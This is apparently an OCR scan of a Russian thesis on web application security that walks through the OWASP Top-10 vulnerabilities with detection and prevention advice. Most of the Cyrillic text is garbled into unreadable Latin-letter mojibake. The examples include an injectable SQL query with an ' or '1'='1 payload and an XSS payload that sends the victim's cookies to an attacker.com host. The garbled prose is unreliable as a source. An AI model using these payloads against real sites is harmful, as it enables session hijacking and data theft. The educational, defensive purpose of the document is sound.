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PetJjepaT 

O'i hc'i coflep>KHT 85 cipaiiHu, 11 pHcyHKOB, 2 laSjiHUbi. 

Hcnojib30BaHO 10 hctohhhkob. 

BEB-nPHJIOUCEHHE, 3A111HTA HHOOPMAU,HH, 
EE30IIACH0CTt>, YH3BHMOCTH, TECTHPOBAHHE 
HA nPOHHKHOBEHHE, MHBEKHMM, SQL, XSS 

B flaHHoil paSoTe paccMaTpHBaioTca ocHOBHbie 
y»3BHMOCTH Be6-npHJIO>KeHHH, MeTOflbl H HHCTpyMeHTbl 
fljia hx oonapyvKCiiHH, a TaK>Ke cymecTByiomHe pemeHHa 
fljia 3amHTbi. OnncaHa pcajin3aumi pa3pa6oTaHHbix 
nporpaMMHbix cpe^CTB fljia ooecncicinni 6e3onacHOcm 
Be6-npHJio>KeHHH i ipn pa6oxc c 6a3aMH jainibix. 
IlpoBC^cnbi cKaHHpoBaHHB TecTOBoro npHJiovKCiiHa 6e3 
Hcnojib30BaHHa pa3pa6oTaHHbix nporpaMMHbix cpcnciB n c 
nx npHMeHeHneM. Pa3pa6oTaHbi oolhmc pcKOMCiinannH no 
o6ecneneHHio 6e3onacHOCTH BeS-npHJioaceHHH. 
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OnpeaejieHHH 


BeS-npHJioacemie - bh# npnjio>KeHHa, b kotopom 
paCCMaipHBaC'ICH B3aHM0^CMCTBMC KJIHeHT-CepBep, B 
kotopom cepBepoM BbiCTynaeT Be6-cepBep, kjihciitom - 
npHJio>KeHHe cnocoonoc ompaBJiaib 3anpocbi Ha Be6- 
cepBep. 

Be6-cepeep - cepBep, npHUHwaiouiMH 3anpocbi h 
Bbi^aiomHH OTBeT no HTTP npoTOKOJiy, a Taioice no 
npoTOKOJiaM ero pacmnpaiomHM. Be6-cepBepoM HMeHyiOT 
Kan nporpaMMHoe, Tan n annapaTHoe oocciicmciihc. 
IIpoKCH-cepBep - cepBep b KOMnbiOTepHbix ccthx, 
II03B0JIHI0LLIHH KJIHeHTaM BbNIOJIlIHTb KOCBeHHbie 3anpOCbI K 
flpyrnM ceTeBbiM cjiy>K6aM. 

BnSjiHOTeKa - Ha6op roTOBbix KJiaccoB, (JjyHKnnn, 
npc^naanaMcmibiH ^ jib ncnoJib30BaHna bo BHeniHnx 
nporpaMMHbix upo^yK i ax. 

OpeiiviBopK - nporpaMMHaa nnaTtfiopMa, onpeflenaiomaa 
CTpyKTypy nporpaMMHon cncTeMbi; nporpaMMHoe 
o6ecneneHne, oojiciHaiomee pa3pa6oTKy n oSbc^HiiciiHC 
pa3Hbix KOMnoHeHTOB 6ojibmoro nporpaMMHoro npoerra. 
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yjOBHMOCTb - HeflOCTaTOK B CHCTCMe, HCn0JIb30BaHHe 
KOTOpOrO MO>KeT npHBeCTH K HapymeHHK) H,eJIOCTHOCTH 
CHCTeMbi hjih Bbi3BaTb ee HenpaBHJibHyio pa6o i y. 
3KcnjiyaTauHfl ymBHMOCTH - Hcnojib30BaHHe HeflOCTaTica 
CHCTeMbi, name Bcero c noMombio BpeflOHOCHoro CKpHnTa 
hjih nporpaMMbi (3KcnjiOHTa). 

BeKTop aTaKH - HanpaBJieHHe bo3Jicmctbm« Ha CHCTeMy co 
CTopoHbi aTaKyiomero. 

AyTeHTHiJiHKauHH - npoBepica noflJiHHHOCTH 
npca'bHBJicmioro nojib30BaTejieM hjiciii n(|)m<aTopa. 
ABTopH3auHH - npcaocraBJiciiHC onpcacjicmiOMy jiHu,y 
hjih rpynne jihh, npaB Ha BbinojniciiHC onpcacjicmibix 
^chctbhh; a TaK>Ke npou,ecc npoBepKH (iioa'iBcpvKjicnHa) 
/lamibix npaB npn nonbiTKe BbinoJinciiHa 3 thx jichctbmh. 
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06o3HaHeHH5i h coKpameHHH 


OWASP - Open Web Application Security Project 
(OTKpbiTbiH npoeKT ooecncMcnHH 6e3onacHOCTH Be6- 
npnjio>KeHHH) 

API - Application Programming Interface (nporpaMMHbin 
HHTep^eirc npHJio’/Keima) 

SQL Structured Query Language («3biK 

CTpyKTypnpoBaHHbix 3anpocoB) 

HTTP - HyperText Transfer Protocol (npoTOKOJi nepeflann 
rnnepTeKCTa) 

URL - Uniform Resource Locator (yica3aTejib pecypca) 

XSS - Cross Site Scripting (Me^caifroBoe Bbinojiuciiuc 
cn,eHapneB) 

CSRF - Cross Site Request Forgery (Me^caifroBas 
noaqejiica 3anpocoB) 

ID - HfleHTH(j)HKaTOp 
OC - OnepauHomiaM CucrcMa 
no - nporpaMMHoe OoecncHcnuc 
B A - Ea3a /famibix 

CYBA - CncTeMa YupaBJicnuH Ea3aMH /famibix 
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BBeaeHHe 

Tsacejio npcacxaBHXb >KH3Hb coBpeMeHHoro oSixiecxBa 
6e3 nepcoHajibHbix KOMnbiOTepoB, CMapT(f)OHOB, 
njiaHineTOB h npoHHx .qeBaiicoB. IUapoKoe 
pacnpocTpaHeHHe ycTpoiiCTB, cnocooiibix Bbixoaixib bo 
BCeMHpHyiO CeTb HHTepHeT (cpcan KOTOpbIX KpOMC 
TeneBH3opoB, My3biKajibHbix njieepoB, HrpoBbix npncxaBOK, 
CMapi-nacoB ecTb TaK>Ke h xojioanjibiiHKH, CTHpajibHbie 
ManiHHbi h ynora), cacjiajio Hcnojib30BaHHe ee 
B03M0>KH0CTeH OOblMlIblM /ICJIOM flJIH JIK)6orO HCJIOBCKa. 
FloKynKa/ npo^aaca TOBapoB, Bbi30B TaKCH, 3aica3 e#bi, 
HTeHHe HOBOCTHbIX H3flaHHH H pa3JIHHHbIX XCMaXHHCCKMX 
acypHajiOB, npocMOTp TejieBH3HOHHbix ncpcaan, cepHajiOB, 
KHHO, ipailCJIHIXHH pa3JIHHHbIX MCpOIipMHXHM, 

npocjiyniHBaHHe My3biKH, ^cnoKiibic ncpcBoabi, onjiaTa 
cneTOB, niTpa(J)OB, 3araicb Ha npneM k Bpany, 
pcaaKinpoBaiiHC H3o6pa>KeHHH, ayano- h Bmico-Kom cma 
- Bee 3to mo>kho zionaxb oiuiaix ir. 

OCHOBHOH (J)OpMOH ^OCTyna KO BCeM 3THM 
bo3mo>khoct}im aBJiseTca Be6-npHJio>KeHHe. Be6- 
npHJio>KeHHe npcacxaBJiacx co6oh RjineHT-cepBepHoe 
npHJio>KeHHe, rac kjimciixom hbjihctch Be6-6pay3ep 
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noj[b30Baxcji>i, a cepBepoM hbjihctch Be6-cepBep. DiaBHoe 
npeHMymecTBO Be6-npHJio>KeHHH 

Kpocci[Jiai(|)opMcmiocib. 

IGlHeHT HBJIHCTCH pcaj[M3aUMCH n0JIb30BaTeJIbCK0r0 
HHTep(J)eHca, reHepHpyeT 3anpocbi k cepBepy h 
o6pa6aTbiBaeT nojiyHcmibic ot Hero OTBeTbi. CepBep 
o6pa6aTbiBaeT 3anpocbi, iiphxo^mlhhc ot KJinema, a 3aTeM 
(J)opMHpyeT Be6-CTpaHHH,y h ornpaBJixcT ee KJincmy no 
npoTOKOJiy HTTP. 

/Jamibic nojib30BaTejieH xpaim ch Ha ccpBepnoil nacTH b 
6a3ax flaHHbix, k KOTopbiM cepBepa oopamaioxcH c SQL- 
3anpocaMH. B othx 6a3ax nainibix MO>KeT xpaHHTbca 
Ba/Kiiaa Jinmiaa Hnc|)op\iaHHH, HanpnMep, nacnopTHbie 
flaHHbie, a/ipeca, Tejie(})OHbi, HOMepa SamcoBCKHx cneTOB h 
KpeflHTHbIX KapT, a 3HaHHT IICOOXOHMMO OOeCIICHHTb 
3am my Konclmncinmajibiibix Ham mix nojib30BaTejieH. 

AKTyajibHOCTb TeMbi 

npeHe6pe>KeHHe paapaSomoKaMH McronaMH h 
cpeflCTBaMH aauiMibi Beo-npHJio>KenHH mojkct npHBecTH k 
KpaiiHe HeraTHBHbiM iiocjichctbhhm. /Jammie MoryT 6biTb 
CKOMnpoMeTnpoBaHbi, H3-3a nero nojib30BaTejiH Moryr 
jiHHiHTbCfl yneTHbix aaiiHCCH b cpa3y HecKOJibKnx Be6- 
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iipMJiO/KCiiHHx, Beflb uaiacTyio Mbi Hcnojib3yeM o#hh a^pec 
3JieKTpoHHOH nombi h oflHH h tot >Ke naponb flJia 
HeCKOJIbKHX CepBHCOB. paipaOOTHHKOB >Ke Kpa>Ka 

jiainibix 3JioyMbiniJieHHHKaMH wpcBara noicpcR penyTau,HH, 
Ba>KHbIX H nOTeHU,HajIbHbIX KJIHeHTOB, a TaK>Ke OrpOMHbIMH 
(J)HHaHCOBbIMH ySbITKaMH H paCXOflaMH, HanpaBJieHHbIMH 
Ha BOCCTaHOBJieHHe namibix. 

AiaKyiouiHC h hx mothbm MoryT 6biTb caMbiMH 
pa3HbiMH. CoTpy^HHKH, o6H>KeHHbie Ha HanajibCTBO hjih 
npecjiaayiouiMC u,ejiH jierKoro oooiauicnHM; 
KOHKypnpyiOHiHe KOMnaHHH, >KCJ[aiouiMC 

CKOMnpoMeTHpoBaTb ziCMicJibnocib onnoHeHTa, pacKpbiib 
ero icKymHC npocKibi, paapaSaibiBaiouiMCCH b ratine; 
KH6ep-npecTynHHKH, Kpa^yniiic Komern h aiHBaiouiMC ero 
b ceTb, hjih >Ke ipcoyiouiMC Bbixyn 3 a Hepa3rjiameHHe 
yKpajjcmiOH HH<j)opMaii,HH; rpynnbi xaKepoB, BbiBoaaiHHC 
H3 CTpoa cepBepa KpynHbix KOMnaHHH c u,ejibio 
npHBJiCMCiiHH BHHMaHHa; cneu,CJiy>K6bi; a Taicace oSbimibic 
nojib30BaTejiH, npoBOjiauiMC aTaKH pajjn rnyTKH. 

OflHH H3 KpynHeHHIHX B EBpOne HCCJICJIOBaTCJIbCKHX 
IiempOB B oSjiaCTH HH(j)OpMaiI,HOHHOH 6e30naCH0CTH 
Positive Research, bxo,lui muii b cocTaB MOKjiyilapo/Hioii 
KOMnaHHH Positive Technologies, b cbocm OTneTe 3a 2016 
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toa npcAOC'iaBHJi namibie o aojic ya3BHMbix cairroB b 
3aBHCHMOCTH OT MaKCHMajIbHOH CTeneHH pHCKa 
y»3BHMOCTeH. HCAOC'iai KH KaK MHHHMyM CpCAIICI O ypOBHB 
6buiH o6Hapy>KeHbi bo Bcex HCCJicnycMbix npHjioaceHHax, a 
B 70% H3 HHX OblJIH liaHACHbl KpHTHHCCKM onacHbie 
ya3BHMOCTH. Majio npocTO pa3pa6oTaTb Be6-npHJio>KeHHe, 
Heo6xoAHMO oSecnenHTb 6e3onacHOCTb AaHHbix h 
TpaH3aKU,HH. 

IJejiH h 3a/jaHH 

IJ,ejibK) AamiOH paSoibi hbjihctch pa3pa6oTKa 
nporpaMMHbix cpcACiB oScciichciihh 6e3onacHOCTH Be6- 
npnjio>KeHHH. ,H,jia aocth/KCiimm nociaBJicmiOH ucjih 
c(})opMyjiHpoBaHbi CJiCAyiOLUHC aa^aHH: 

1) npoaHajIH3HpOBaTb OCHOBHbie yJBBHMOCTH Be6- 
npnjio>KeHHH h BeKTopbi aTaK Ha hhx; 

2) HCCJieAOBaTb mctoabi h cpcACTBa bbibbji chhb 
ya3BHMOCTeH; 

3) HCCJieAOBaTb mctoabi h cpcACTBa ycipanciiHH 
ya3BHMOCTeH h aauiM i bi ot aTax paajiHHiibix bhaob; 

4) c(J)opMyjiHpoBaTb o6lhhc pcKOMCimaunn no 

MHHHMH3aU,HH B03HHKH0BCHHB yXBBMMOCTCH npH 
pa3pa6oTKe Be6-npHJio>KeHHH. 
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1. YH3BHM0CTH Be6-npHJ105KeHHH, 
MeToabi hx o6Hapy5KeHHH h ycTpaHeHHH 


1.1. OCHOBHbie yH3BHMOCTH se6- 
npHJlOiKeHHH 

IlpH pa3pa6oTKe bco-iiphjiokciihh, Bcer/ia iicoSxo^hmo 
yHHTbiBaTt oSecneneHHe 6e3onacHOcm .qaHHbix. 
Hc^ociaiomio npocTO Hcnojib30BaTb cjio>KHbie napojin h 
pa3JiHHHbie 3amHmeHHbie coc^hiiciimm. CymecTByiOT 
pa3JiHHHbie BeKTopbi aTaK, Hcnojib3yiomHe Te hjih HHbie 
nporpaMMHbie ya3BHMOCTH, h paapaSoiHHKH ^oji/Kiibi 
yHHTbiBaTb nanSojicc onacHbie h pacnpocTpaHeHHbie 
y»3BHMOCTH, a Taioice mcio^bi npeflOTBpameHHa noaBjiemia 
3THX yH3BHMOC'ICH B IipOrpaMMHOM lipO/iyKIC. 

Mc/KTiynapo^nax ncKOMMcpnccKaa opranmannH 
OWASP (Open Web Application Security Project), 
3aHHMaioma»ca aHajiH30M n MCio^aMH ynynmeHna 
6e3onacHOCTH Be6-npnjio>KeHHH, onySnnKOBajia cnncox 10- 
n nanSojiee KpHinmibix yjBBHMOCTen OWASP Top-10 
(2013 rofl), uiaBiiOH n,ejibio KOToporo aBJiaeica yBCJinnciiHC 
ocBeflOMJieHHOCTH paapaSoiMHKOB IIO. PaccMOTpnM 
noflpoOHee ya3BHMOcm H3 flaHHoro cnncxa. 
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1.1.1. Injection (BHe/jpeHne Ko/ja) 

B03M0>KH0CTb BlICApCIIMH HII'bCKUHH (SQL, OS, LDAP) 
B03HHKaeT, KoiTia ncnaaC/Kiibie naimuc onipaBJiaioica 
HHTepnpeTaTopy KaK lacib komaiiabi hah 3anpoca. 
Bncapcmibie 3JioyMbiniJieHHHKOM naimuc Moryr 
cnpoBon,HpoBaTb BbiiiojinciiHC ncnpcAnaMcpemibix KOMaiiA 
hjih aocxyii k aamibiM 6e3 HaAJieacameH aBTopH3au,HH. 

• BeKTopbi aTaKH - aiaKyiouiHH oinpaBJiaci BbipaaceHHa, 
Hcnojib3yiomHe CHHTaKCHC u,ejieBoro HHTepnpeTaTopa. 

• CjiaSbie MecTa CHCTeMbi 6e3onacHOCTH - ycTapeBHiHH 
koa; 3anpocbi SQL, LDAP, Xpath, NoSQL; KOMaHAbi OC; 
XML-napcepbi; 3arojiOBKH SMTP; apryMeHTbi nporpaMMbi. 

• Tcxiihhcckmc iiocjicactbmh - HCKa»:eHHe hjih noTepa 
AaHHbix, OTKa3 AOCTyna k yHCi iibiM 3araicaM h jiamibiM. 

OnpeAeJieHHe yH3BHMOCTH 

JlyHiHHH cnoco6 onpeAeJiHTb, hbjixctch jih npnjio>KeHHe 
ya3BHMbiM AJia HHbeKu,HH - npoBepKa hctkoi o otacjiciimh 
H eHaAe>KHbix Aamibix ot KOMaHA h 3anpocoB 
HHTepnpeTaTopaMH. /(jih SQL-3anpocoB 3 to 03iia L iaci 
Hcnojib30BaHHe noAroTOBJieHHbix 3anpocoB h xpaHHMbix 
npou,eAyp, H36eraHne a h 11 a m 11 h cc k iix 3anpocoB. TaKaa 
npoBepKa MO>KeT 6biTb npoBeAeHa BpynHyio - peBbio KOAa. 
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Taioice mo>kho Hcnojib30BaTb cneu,HajiH3HpoBaHHbie 
HHCTpyMeHTbl - CKaHepbl yX3BMM0CTCH. 

IIpe/iOTBpameHHe yjoBHMOCTH 

YcTpaHeHMe bo3mo>khocth Biic^pcumi rcotta Tpe6yeT 
OTZicjiciiHC ncna^cvKiibix ^amibix ot KO\ianzt h 3anpocoB. 

1) n pczn i o h'ihicj i b n bi m BapnainoM »Bji»eTca 

Hcnojib30BaHHe 6e3onacHoro API, KOTopbiii nojiHOCTbio 
H36eraeT Hcnojib30BaHHa HHTepnpeTaTopa hjih 
npeflOCTaBJiaeT 11apaxicipH30Ban11 bi it nm cp(|)eitc. 

2) Ecjih napaMeTpH30BaHHbiii API nc^ociyncn, CJicttyet 
3KpaHHpoBaTb cneu,HajibHbie CHMBOJibi. Pa3HOo6pa3Hbie 
cnocoSbi onHcaHbi b /toKyMcmc ESAPI (Enterprise Security 
API) ot OWASP. 

3) PcKOMCiwycica Taioice npoBcpaib /toctOBcpnoctb 
BBOfla C «6eJTbIM CIIHCKOM», HO 3TO He HBJIHCTCH nOJTHOH 
3amHToir, TaK KaK miioi hc npHjioaceHHa ipcSyior BBO#a 
cneu,HajrbHbix chmbojtob. 

IIpHMepbi cueHapneB aTaKH 

IIpHjro>KeHHe Hcnojrb3yeT ncna/jOKiibic .uamibic npn 
nocTpoeHHH cjreflyromero y»3BHMoro SQL-3anpoca: 

String query = "SELECT * FROM accounts WHERE custID-" + 
request.getParameter("id") + 
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3jioyMbinuieHHHK hbmchhct 3iiaMCiiHC napaMeTpa ‘id’ b 
6pay3epe, hto6bi OTnpaBHTb: ‘ or Hanpinviep: 

http://example.com/app/accountView?id=' or 'l'= 

3to H3MCHHCT 3naHCiiHC 3anpoca, b pe3yjibTaTe Hero 
B03Bpauiaioi CH Bee 3anHCH H3 TaSjiHUbi yiCTiibix 3anHCcii. 

1.1.2. Broken Authentication and Session 
Management (HeKoppeKmaa ayTeHTHjJmKapna n 
ynpanjieHne ceaHcaMn) 

OyHKu,HH iipMJiO/KCii hx, CBinamibie c ayreHTH(J)HKaii,HeH 
h ynpaBJieHneM ceaHcaMn, Macro He peajiH30BaHbi 
flOJDKHbIM o6pa30M, HTO II03B0JIHCT 3JIOyMbIHIJieHHHKaM 
KOMnpoMeTHpoBaTb napojiH, kjhohh hjih tokchw ceaHca 
hjih 3KcnjiyaTHpoBaTb jrpyrnc nc/rociaiKH peajiH3an,HH, 
HToSbl HCn0JIb30BaTb ID flpyTHX l[0JIb30BaTCJICH. 

• BeKTopbi aTaKH - ai aKyiouiHii Hcnojib3yeT y»3BHMOCTH b 
(|)yiiKUH>ix ayreHTH(J)HKaLi,HH hjih ynpaBjieHHa ceaHCOM 
(HanpHMep, OTicpbiTbie yHCiiibic bbiihch, napojiH, ID 
ceaHca), hto6bi Bbijjai b ce6x 3 a jipyi oro nojibBOBai cjia. 

• Cjiadbie MecTa CHCTeMbi 6e3onacHOCTH - MexaHH3Mbi 
ynpaBJieiiHH ceaHCOM, bbixo^om H3 CHCTeMbi, ynpaBJicnnc 
napojiaMH, TanM-ayTbi, 3anoMHHaHHe nojib30BaTejHi, 
odHOBJieHHe yneTHOH 3anncH. 
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• TCXIIHHCCKHC nOCJieflCTBHS - B03M0)KH0CTb aTaKOBaTb 
yHCiiibic 3anHCH, b tom hhcjic npHBHJierHpoBaHHbie. Ilpn 
ycneniHOH aTaKe 3JioyMbinuieHHHK mo>kct Hcnojib30BaTb b 
Be6-npHJIO>KeHHH BCe B03M0>KH0CTH acepTBbl. 

Onpe/ieJieHHe yH3BHMOCTH 
Bed-npHJioaceHHe mo>kct Sbitb ya3BHMO, ccjih: 

1) yHCiiibic flamibic nojib30Baicjia He aaiumuciibi npn 
xpaHeHHH xeniHpoBaHHeM hjih uiM(|)poBaiiHCM; 

2) yHCiiibic aamibic Moryr 6biTb noaoopaiibi hjih 
nepe3anHcaHbi i ip m He6e3onacHbix (JjyHKijHax ynpaBJieHHa 
aKKayHTOM (coaaaiiHC aiocayHTa, himciiciimc napojia); 

3) ID ceaHca o i oopavKaio ica b URL-aapcce; 

4) ID ceaHCOB He orpaiiMiciibi no BpeMeHH, eeaHCbi 
nojib30BaTejieH hjih TOKeHbi ayicmM(|)MKaiiHH He 
SjiOKnpyiOTca ^ojdkhbim o6pa30M npn Bbixoac H3 aKKayHTa; 

5) ID ceaHCOB He MeHaiOTca nocjie ycneniHoro Bxo#a. 
IIpe/ioTBpameHHe yH3BHMOCTH 

OCHOBHaa pCKOMCItaaUHH jtjih opraHH3au,HH - 
npcaociaBHib pa3pa6oTHHKaM eauiibiii naoop cpcaciB 
ynpaBJieHHa eeaHCOM, KOTopbie zioji/Kubi: 

1) oi BCMai b BceM ipeSoBaHHBM k ayreHTH(J)HKaii,HH h 
ynpaBJieHHa eeaHCOM, onpcacjicmibiM b OWASP 
Application Security Verification Standard (ASVS); 
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2) HMeTb npocTOH HHTep(J)eHC fljia paapaSoxHHKOB, 

HanpHMep ESAPI Authenticator n User APIs. 

IIpHMepbi cueHapnee aTaKH 

CucuapuH N° 1: npruioacciiMC ana oponupoBanua 
aBMaGujiciOB iionncpacMBacT nepenncbiBaHHe URL- 
aapccoB, aoSaBJiacM xyna ID ceaHca n nojiynaeM: 
http://example.com/sale/saleitems?sessionid=268544541&dest=SPB 

ABT 0 pH 30 BaHHbIH n 0 JTb 30 BaTeJTb OllipaBJiaC'l apy 3 ba\I 
ccburKy, HioSbi cooSuiHTb o coBepmeHHoir noKynKe. Ilpn 
nepcxoac no ttoh ccburKe, 6yncx HCiioJibaoBaxbca ero ace 
ceccna, a 3 i ran nr, Moaciro uojiynuib Bee ero Jiumibie 
aamibic, b tom mhcjic n HiK|)op\iauHio no Kpcau riioH KapTe. 

Cu,eHapnH N°2: TanM-ayrbi npHnoacemia ycTaHOBjreHbi 
HenpaBHjrbHO. fljra aociyua k cairry nojib30BaTejrb 
Hcnojrb3yeT oSinenocrymibiH KOMnbiOTep. Bmccto Bbixoaa 
H3 aKKayHTa nojTb30BarejTb npocTO 3aKpbiBaeT BKJiaaby 
6pay3epa h yxoaux. Hcpca nac ai aKyiouiHu ncnojrb3yeT tot 
ace 6pay3ep c Bee eme aBTopn30BaHHbiM nojrb30BaTejieM. 

1.1.3. Cross-Site Scripting (XSS, MeaccaiiTOBoe 
BbinojiHeHne cpeHapneB) 

Bo3MoacHOCTb ocyuicc'iBJicnHa XSS-aTaKH B03HHKaeT, 
Korna iipujiO/KCiiHC npnHHMaeT nciiancaciibic namibic n 
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onipaBJixcT hx b 6pay3ep 6e3 na^jiOKamcH npoBepKH hjih 
3KpaHHpOBaHHB. XSS II03B0JUICT 3JI0yMbIIIIJieHHHKaM 
Bbinojinaib CKpHiribi b 6pay3epe iicepTBbi, cnocoSiibic 
3axBaTbiBaTb ceccHH K)3epoB, HCKaacaTb BCO-cipaiiHUbi hjih 
ncpcnanpaBJiH i b nojibBOBaicjia Ha Bpcjionociibic cathbi. 

• BeKTopbi aTaKH - araKyioiiiMM oinpaBJiaci CKpmnbi, 
KOTopbie HcnojiHaiOTca HHTepnpeTaTopoM b 6pay3epe. 

• Cjia6bie MecTa cncTeMbi 6e3onacHOCTH - nojia BBOfla, 
/lamibic H3 KOTopbix oiiipaBJiaioica b 6pay3ep 6e3 
iiajiJiOKauiCH npoBepKH hjih (})HJibTpaij,HH. 

• TeXHHHeCKHe IIOCJICACTBMH - B03M0>KH0CTb 3aXBaTa 
ceccHH K)3epa, HCKaaceHHH Be6-CTpaHHii,bi, bctbbkh 
B pcjionocnoro KOHTeHTa hjih ncpcnanpaBJiciiHa K)3epoB. 

Onpe/ieJieHHe yioBHMOCTH 

Be6-npHJio>KeHHe mo>kct 6biTb y»3BHMO, ecjin 
n0JIb30BaTeJIbCKHH BBOA He 3KpaiIMpyCTCfl AOJDKHbIM 
o6pa30M hjih He npoxoAHT BajiHAauHio Ha cepBepe nepcA 
BKJHOHeHHeM 3TOrO BBOAa B CTpaHHH,y BblBOfla. 

ABTOMaTH3HpOBaHHbie HHCTpyMeHTbl MOryT HaHTH 
HexoTopbie yn3BHMOCTH XSS aBTOMaTHHecKH. OjuiaKO 
KaiKAOe npHJIOVKClIHC CTpOHT CTpaHHH,bI nO-pa3HOMy H 
Hcnojib3yeT pa3Hbie HHTepnpeTaTopbi Ha CTopcme 6pay3epa, 

TaKne xax JavaScript, ActiveX, Flash h Silverlight, hto 
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3aipy^n«ci aBio\iaiHHCCKOC o6Hapy>KeHHe. HaHjiynimiH 
Bap Ham - KOMSmiauMx aHajiroa KO#a, TCCTHpoBaiiMH Ha 
npoHHKHOBeHHe h a b i o m a i H h cc ko ro noflxofla. 

IIpe/iOTBpameHHe yjoBHMOCTH 

npc^oiBpaLHCiiHC XSS aTaK ipcSyci pa3jicjiciiHx 
nciia^OKiibix /jamibix ot co#ep>KHMoro 6pay3epa. 

1) npCZHIOH'I HICJIbllbIM BapHaniOM HBJIHCTCH HCKJIIOHCIIHC 

iiciia/icvKiibix namibix Ha ochobc KOHTeKCTa HTML (Tejio, 
aipnGym, JavaScript, CSS hjih URL), b KOTopbie 6yflyr 
iiOMCLHCiibi jiamibic. Mcio^bi OKpaiiHpoBaiiHM namibix 
paccMaTpHBaiOTca b OWASP XSS Prevention Cheat Sheet. 

2) PcKOMCiwycTCH Hcnojib30BaTb «6ejibiH» ciihcok fljia 
npoBepKH BBOfla Ha cepBepe, ho oto He »BJiaeTca naHaiteeh, 
Tan Kan ,zpi» miioi hx npHJio>KeHHH i peoyioi CH cnen,HajibHbie 
CHMBOJibi. Taicaa npoBepica flOJDKHa iipoBepaib jjjim iry, 
CHMBOJibi, (j)opMaT h npaBHJia uchctbmm ^jia othx namibix. 

3) Hcnojib30BaHHe auto-sanitization SnSiiHOTeK 
(AntiSamy ot OWASP hjih Java HTML Sanitizer Project). 

IIpHMepbi cpeHapneB aTaKH 

npHJio>KeHHe Hcnojib3yeT iicnajicvKiibic .uamibic npn 
nocTpoeHHH (|ipai Mcm a HTML 6e3 npoBepKH BBoaa: 

(String) page += "<input name='creditcard' type='TEXT' value="' + 
request. getParameterf'CC") + 
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ATaicyiomHH hbmciihct napaMeTp «CC» b 6pay3epe: 
'><script>document. location='http://www.attacker.com/cgi- 
bin/cookie.cgi ?foo='+document.cookie</script>'. 

3to npHBOflHT k OTnpaBKe ID ceaHca JKepTBBi Ha cam 
3JioyMbimjieHHHKa, no3BOJia» 3axBaTHTB icKyutyio ceccHio. 

1.1.4. Insecure Direct Object References 
(He6e3onacHbie npHMbie ccmjikh Ha obneKTbi) 

IIpaMbie ccbuiKH Ha oSbCKi bi hmciot MecTO 6biTb, Kor^a 
paapaSoiHHK npcjiocTaBJixcr ccbuiKy Ha BHyrpeHHHH 
oSbCKi peajiH3au,HH, laKoti KaK (jjaira, KaTajior hjih kjiiom 
Bfl. Ee3 npoBepKH Kompojia ztocxyiia hjih jtpyi oii 3amHTbi 
3JI0yMbIIHJieHHHKH MOryT MaHHnyjIHpOBaTb 3THMH 
ccbuiKaMH pjin flOCTyna k HecaHKUHOHHpoBaHHbiM jiamibiM. 

• BeKTopbi aTaKH - aBTopH30BaHHbiH aTaKyiomHH 
H3MeHaeT anaiciiHC napaMeipa, KOTopbiii ccbuiaeTca Ha 
CHCTeMHbiii 06'bCKT, Ha KOTopbiii y nojib30Bai cjia HeT npaB. 

• Cjia6bie MecTa CHCTeMbi 6e3onacHOCTH 
Hcnojib30BaHHe peajibHbix hmcii hjih Kjnoneii oSbCKi OB npn 
C03flaHHH BCO-CipailHU H OTCyTCTBHe npOBepKH HajIHHHB y 
nojib30BaTejia npaB flociyna k u,ejieBOMy oSbeiery. 

• TCXIIHHCCKMC HOCJICJtCIBHH - KOMlipOMCiaUMH BCeX 
Ztamibix, Ha KOTopwe ccbuiacica napaMeTp. 
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OnpeaejieHiie yjoeiiMocTii 

JlynniMH cnoco6 onpcjicjimb, ys3BHM0 jih npHJio>KeHHe 
fljia He6e3onacHbix npaMbix ccbuiox Ha oSbCKibi - 
npoBepHTb najiHMHC aaiiiH i bi ^jih ziamibix ccbuiox. 

1) ,H,Jia npaMbix ccbuiox Ha orpaiiHHcmibic pecypcbi - 
npoBepKa npaB nocxyna iiojibBOBarcjin k pecypcy. 

2) Ecjih ccbuiKa He hbjihctch np»MOH - conocTaBJieHHe 
ccbuiKH h 06'bCK i a, pa3pemeHHoro fljia nojib30BaicjiM. 

3(J)(J)eKTHBHbIMH MCTOJiaMH OOliapy/KCHMH flaHHOH 
ya3BHMOCTH »BJBHOTC» o63op KOfla H pyHHoe TeCTHpOBaHHe. 
ABTOMaTH3HpOBaHHbie HHCTpyMeHTbl oSblHIIO He BblSBJHHOT 
TaKne HeflOCTaTKH, Tax icaic ohh He Moryr pacno3HaTb, hto 
T pe6yeT aamm bi hjih hto 6e3onacHO hjih He6e3onacHO. 
IIpe/iOTBpameHHe yioBHMOCTH 

JX-im npcHOiBpaLHcnHH He6e3onacHbix np»Mbix ccbuioK 
Ha oSbCKTbl CJIC^yCT lipHHCp’/KMBaTbCM peKOMCIWaHHH: 

1) Hcnojib30BaTb ncnpxMbic ccbuiKH Ha oSbCKibi ^jia 
xa>Kfloro nojibBOBai cjia hjih ceaHca. 

2) Hcnojib30BaHHe npaMOH ccbuiKH H3 ncnajiC/Kiioro 
HCTOHHHKa flOJDKHO BKJHOHaTb npoBepKy aocryiia. 

IIpHMepbi cpeHapneB aTaKH 

ripHJiO/KcnHC Hcnojib3yeT HenpoBepeHHbie jiamibic b 
SQL- 3anpoce, KOTopbiii oopauiaeiCH k jihhhwm jiamibiM: 
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String query = "SELECT * FROM accts WHERE account = ?"; 
PreparedStatement pstmt = connection.prepareStatement(query,...); 
pstmt.setString( 1, request.getParameterf'acct")); 

ResultSet results = pstmt.executeQuery(); 

3jioyMbinuieHHHK mciihct napaMeTp «acct» jjj im 
OTnpaBKH jnoSoro aKKayHTa. Ilpn OTcyTCTBnn 
HeoSxOflHMOH npOBepKH OH MO/KCT IIOJiyHHTb flOCTyn K 

yneTHOH 3anHCH jitoSoro nojib30BaTejia. 
http:/ /example.com/app/accountInfo?acct=notmyacct 

1.1.5. Security Misconfiguration (He6e3onacHaa 
KOH(]jHrypauHfl) 

Bbicokhh ypoBeHb 3amHibi Tpe6yeT iiajiMHua 
6e3onacHOH KOH(j)HrypaH,HH hjih npnjioaceHna, Be6-cepBepa, 
CYBJl h ocTajibHbix KOMnoHeHTOB. Be3onacHbie HacTpoitKH 
^OJDKHbl 6bITb OlipC^CJIClIbl, peajIH30BaHbI H COXpaHeHbl, 
nocKOJibKy HacTpoiiKH no yMOJinamoo nacTO He6e3onacHbi. 

• BeKTopbi aTaKH - aiaKyioiitHH nojiynacr ^ociyn k 
yneTHbiM 3anncaM no yMOJinaHnto, Hencnojib3yeMbiM 
CTpaHHu,aM, i[C3aLnMLncinibiM (j)anjiaM n KaTanoraM. 

• CnaSbie MecTa cncTeMbi 6e3onacHOCTn - He6e3onacHaa 
